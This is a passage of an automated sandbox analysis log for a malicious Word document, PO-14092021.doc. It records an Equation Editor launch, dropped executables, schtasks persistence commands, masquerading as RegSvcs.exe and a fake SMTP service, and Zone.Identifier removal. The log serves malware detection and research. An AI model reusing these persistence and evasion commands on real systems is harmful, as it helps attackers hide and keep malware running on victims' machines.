        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: plugmanzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: plugmangd5693.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: RWbqWnnjDWI.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: PO-14092021.docVirustotal: Detection: 27%
        Source: PO-14092021.docReversingLabs: Detection: 20%
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...................................................................8...............................
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.............................................................................X.......................
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`.......................(.P.....T.......................A.................................................................*.....
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................ .......................(.P.....X.........................................................................................$.....
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmangd5693.exe C:\Users\user\AppData\Roaming\plugmangd5693.exe
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'
        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmangd5693.exe C:\Users\user\AppData\Roaming\plugmangd5693.exe
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_01D01DFA AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_01D01DC3 AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D149A AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D1463 AdjustTokenPrivileges,
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$-14092021.docJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD9E9.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@20/15@7/2
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{252c9db9-aa04-46ee-b18e-f50ea5b00a3e}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMutant created: \Sessions\1\BaseNamedObjects\tpartidvAVXOECPsSL
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\dll\System.pdbog source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: System.pdb H source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: qC:\Windows\System.pdb4 source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: s.pdb source: RegSvcs.exe, 00000008.00000002.671847791.0000000000C7D000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: smtpsvc.exe
        Source: Binary string: #=qo5Pv9nXCIU9X_B8SJDUR_qgp7npNK2pA1rGP0GNQ51o=symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: ystem.pdbl2}/ source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdbes source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: plugmanzx[1].exe.2.dr, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: plugmangd5693.exe.2.dr, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: RWbqWnnjDWI.exe.4.dr, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.2.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_003377A7 push es; ret
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_00337895 push es; ret
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_00309288 push ebp; retn 0030h
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_00306D54 pushad ; retn 0021h
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F84A0 pushfd ; retf 006Eh
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00763DFF push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0076410E push es; retn 0000h
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0076410E push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0019989B push ecx; retf 0019h
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0019749C push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_001974A8 push ebp; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00199D68 pushad ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00199D64 push eax; retf
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51220461455
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51220461455
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51220461455
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugmangd5693.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeFile created: C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
